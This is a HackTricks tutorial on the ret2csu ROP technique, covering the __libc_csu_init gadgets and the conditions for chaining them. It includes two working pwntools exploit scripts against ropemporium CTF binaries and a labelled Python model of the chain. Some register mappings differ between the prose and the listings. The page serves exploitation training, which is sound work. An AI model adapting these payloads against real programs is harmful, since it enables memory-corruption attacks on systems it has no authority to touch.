Ret2csu
> [!TIP]
> Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
> Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
>
> Support HackTricks
> - Check the subscription plans!
> - Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
> - Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
https://www.scs.stanford.edu/brop/bittau-brop.pdf

## Basic Information

ret2csu is a hacking technique used when you are trying to take control of a program but cannot find the gadgets you would normally use to manipulate the program's behavior.

When a program uses certain libraries (like libc), it has some built-in functions for managing how different pieces of the program talk to each other. Among these functions are some hidden gems that can act as our missing gadgets, especially one called `__libc_csu_init`.
## The Magic Gadgets in __libc_csu_init

In `__libc_csu_init`, there are two sequences of instructions (gadgets) to highlight:

- The first sequence lets us set up values in several registers (rbx, rbp, r12, r13, r14, r15). These are like slots where we can store numbers or addresses we want to use later.
```
pop rbx;
pop rbp;
pop r12;
pop r13;
pop r14;
pop r15;
ret;
```
This gadget lets us control these registers by popping values off the stack into them.

- The second sequence uses the values we set up to do a couple of things:
  - Move specific values into other registers, making them ready for us to use as parameters in functions.
  - Perform a call to the address stored at a base register plus rbx*8 (the base register is r12 in the listing below; some builds use r15 instead, depending on how the compiler allocated registers).
```
mov rdx, r15;
mov rsi, r14;
mov edi, r13d;
call qword [r12 + rbx*8];
```
- Maybe you don't know any address to write there and you need a `ret` instruction. Note that the second gadget will also end in a `ret`, but you will need to meet some conditions in order to reach it:
```
mov rdx, r15;
mov rsi, r14;
mov edi, r13d;
call qword [r12 + rbx*8];
add rbx, 0x1;
cmp rbp, rbx
jnz <func>
...
ret
```
The conditions will be:

- `[r12 + rbx*8]` must point to an address storing a callable function (if you have no idea and there is no PIE, you can just use the `_init` function):
  - If `_init` is at `0x400560`, use GEF to search for a pointer to it in memory and make `[r12 + rbx*8]` the address holding a pointer to `_init`:
```
# Example from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
gef➤  search-pattern 0x400560
[+] Searching '\x60\x05\x40' in memory
[+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x400000-0x401000), permission=r-x
  0x400e38 - 0x400e44  →   "\x60\x05\x40[...]"
[+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x600000-0x601000), permission=r--
  0x600e38 - 0x600e44  →   "\x60\x05\x40[...]"
```
- `rbp` and `rbx` must hold the same value at the `cmp` to avoid the jump; since `rbx` is incremented by 1 right before the comparison, that means setting `rbp = rbx + 1` when popping them.
- There are some trailing pops you need to take into account (the stack words consumed between the call and the final `ret`).
## RDI and RSI

Another way to control `rdi` and `rsi` from the ret2csu gadget is by accessing specific offsets:

Check this page for more info:

{{#ref}}
brop-blind-return-oriented-programming.md
{{#endref}}
## Example

### Using the call

Imagine you want to make a syscall or call a function like `write()` but you need specific values in the `rdx` and `rsi` registers as parameters. Normally, you'd look for gadgets that set these registers directly, but you can't find any.

Here's where ret2csu comes into play:

- Set Up Registers: Use the first magic gadget to pop values off the stack into rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx), and r15.
- Use the Second Gadget: With those registers set, you use the second gadget. This lets you move your chosen values into `rdx` and `rsi` (from r14 and r13, respectively), readying parameters for a function call. Moreover, by controlling `r15` and `rbx`, you can make the program call a function located at the address you calculate and place into `[r15 + rbx*8]`.

You have an example using this technique and explaining it here, and this is the final exploit it used:
```python
from pwn import *

elf = context.binary = ELF('./vuln')
p = process()
rop = ROP(elf)  # ROP builder the chain below is appended to

POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208  # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028

rop.raw(b'A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0)                  # r12
rop.raw(0)                  # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC)             # r15 - holds location of called function!
rop.raw(REG_CALL)           # all the movs, plus the call

p.sendlineafter(b'me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's written
print(p.recvline()) # should receive "Awesome work!"
```
> [!WARNING]
> Note that the previous exploit isn't meant to achieve RCE; it is only meant to call a function named `win` (taking the address of `win` from stdin via the `gets` call in the ROP chain and storing it in r15) with a third argument whose value is `0xdeadbeefcafed00d`.

### Bypassing the call and reaching ret

The following exploit was extracted from this page, where ret2csu is used but, instead of using the call, it bypasses the comparison and reaches the `ret` after the call:
```python
# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
# This exploit is based off of: https://www.rootnetsec.com/ropemporium-ret2csu/

from pwn import *

# Establish the target process
target = process('./ret2csu')
#gdb.attach(target, gdbscript = 'b * 0x4007b0')

# Our two __libc_csu_init rop gadgets
csuGadget0 = p64(0x40089a)
csuGadget1 = p64(0x400880)

# Address of ret2win and _init pointer
ret2win = p64(0x4007b1)
initPtr = p64(0x600e38)

# Padding from start of input to saved return address (bytes, so it
# concatenates with the p64() output under Python 3)
payload = b"0"*0x28

# Our first gadget, and the values to be popped from the stack
# Also a value of 0xf means it is a filler value
payload += csuGadget0
payload += p64(0x0) # RBX
payload += p64(0x1) # RBP
payload += initPtr # R12, will be called in `CALL qword ptr [R12 + RBX*0x8]`
payload += p64(0xf) # R13
payload += p64(0xf) # R14
payload += p64(0xdeadcafebabebeef) # R15 > soon to be RDX

# Our second gadget, and the corresponding stack values
payload += csuGadget1
payload += p64(0xf) # qword value for the ADD RSP, 0x8 adjustment
payload += p64(0xf) # RBX
payload += p64(0xf) # RBP
payload += p64(0xf) # R12
payload += p64(0xf) # R13
payload += p64(0xf) # R14
payload += p64(0xf) # R15

# Finally the address of ret2win
payload += ret2win

# Send the payload
target.sendline(payload)
target.interactive()
```
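To see why the conditions listed earlier (a mapped pointer at `[r12 + rbx*8]`, `rbp` equal to the incremented `rbx`, the extra stack words eaten before the final `ret`) have to hold, the following added example models the two gadgets in plain Python and walks the payload layout of the exploit above through them. It is not part of the original page or of the guyinatuxedo/rootnetsec exploit; the addresses are the ones quoted on this page, and the `MEMORY` dictionary is a constructed stand-in for the one readable qword the indirect call dereferences. Everything else (the helper names, the padding length, the `page_payload` keyword arguments) is assumed for illustration.

```python
import struct

MASK64 = (1 << 64) - 1

# Addresses quoted on this page for the ropemporium ret2csu binary.
CSU_GADGET0 = 0x40089a  # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
CSU_GADGET1 = 0x400880  # mov rdx,r15; mov rsi,r14; mov edi,r13d; call [r12+rbx*8]; ...
INIT = 0x400560         # _init, a harmless function that simply returns
INIT_PTR = 0x600e38     # qword in the binary's read-only data holding INIT (GEF search above)
RET2WIN = 0x4007b1

# Constructed stand-in for the target's readable memory: only the qword the
# indirect call dereferences is modelled.
MEMORY = {INIT_PTR: INIT}

CSU_REGS = ("rbx", "rbp", "r12", "r13", "r14", "r15")


def p64(value):
    return struct.pack("<Q", value)


def page_payload(rbx=0, rbp=1, r12=INIT_PTR):
    """Rebuild the byte layout used by the exploit above: padding, gadget0,
    six popped qwords, gadget1, one qword eaten by `add rsp, 8`, six filler
    pops, then ret2win. Keyword arguments let a condition be broken on purpose."""
    payload = b"0" * 0x28
    payload += p64(CSU_GADGET0)
    payload += p64(rbx) + p64(rbp) + p64(r12) + p64(0xf) + p64(0xf) + p64(0xdeadcafebabebeef)
    payload += p64(CSU_GADGET1)
    payload += p64(0xf) * 7                 # add rsp, 8 filler + six trailing pops
    payload += p64(RET2WIN)
    return payload


def payload_to_qwords(payload, padding=0x28):
    """Split the bytes after the padding into the qwords that land on the stack,
    starting at the overwritten saved return address."""
    body = payload[padding:]
    if len(body) % 8:
        raise ValueError("chain is not qword aligned")
    return [struct.unpack("<Q", body[i:i + 8])[0] for i in range(0, len(body), 8)]


def simulate_csu(stack, memory):
    """Model the two gadgets over `stack` (a list of qwords). Returns
    (regs, call_target, ret_target). Raises ValueError wherever the real chain
    would fault or loop instead of reaching the final ret."""
    regs = {r: 0 for r in CSU_REGS + ("rdx", "rsi", "edi")}
    words = iter(stack)

    def pop():
        try:
            return next(words)
        except StopIteration:
            raise ValueError("chain ran off the end of the controlled stack") from None

    if pop() != CSU_GADGET0:
        raise ValueError("saved return address does not point at the pop gadget")
    for r in CSU_REGS:                      # pop rbx ... pop r15
        regs[r] = pop()
    if pop() != CSU_GADGET1:                # ret -> second gadget
        raise ValueError("pop gadget does not return into the mov/call gadget")

    regs["rdx"] = regs["r15"]
    regs["rsi"] = regs["r14"]
    regs["edi"] = regs["r13"] & 0xffffffff
    slot = (regs["r12"] + regs["rbx"] * 8) & MASK64
    if slot not in memory:
        raise ValueError(f"call [r12+rbx*8] reads unmapped address {slot:#x}")
    call_target = memory[slot]              # assumed to return normally, as _init does

    regs["rbx"] = (regs["rbx"] + 1) & MASK64
    if regs["rbp"] != regs["rbx"]:
        raise ValueError("cmp rbp, rbx not equal: jnz loops back to the call")
    pop()                                   # add rsp, 8 discards one qword
    for r in CSU_REGS:                      # trailing pops before the final ret
        regs[r] = pop()
    return regs, call_target, pop()         # ret transfers to the last qword


def chain_reaches_ret(stack, memory):
    """True if the modelled chain makes it to the final ret of __libc_csu_init."""
    try:
        simulate_csu(stack, memory)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    regs, callee, ret_to = simulate_csu(payload_to_qwords(page_payload()), MEMORY)
    print(f"call -> {callee:#x}, rdx = {regs['rdx']:#x}, final ret -> {ret_to:#x}")
```

Running it with the page's values reports the call landing on `_init`, `rdx` set to `0xdeadcafebabebeef`, and the final `ret` transferring to `ret2win`; setting `rbp=0` or an unmapped `r12` in `page_payload()` makes `chain_reaches_ret` return False, which is exactly the crash or infinite loop you would otherwise only discover in the debugger.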
## Why Not Just Use libc Directly?

Usually these cases are also vulnerable to ret2plt + ret2lib, but sometimes you need to control more parameters than can be easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and finding gadgets to set all of them directly might not be possible.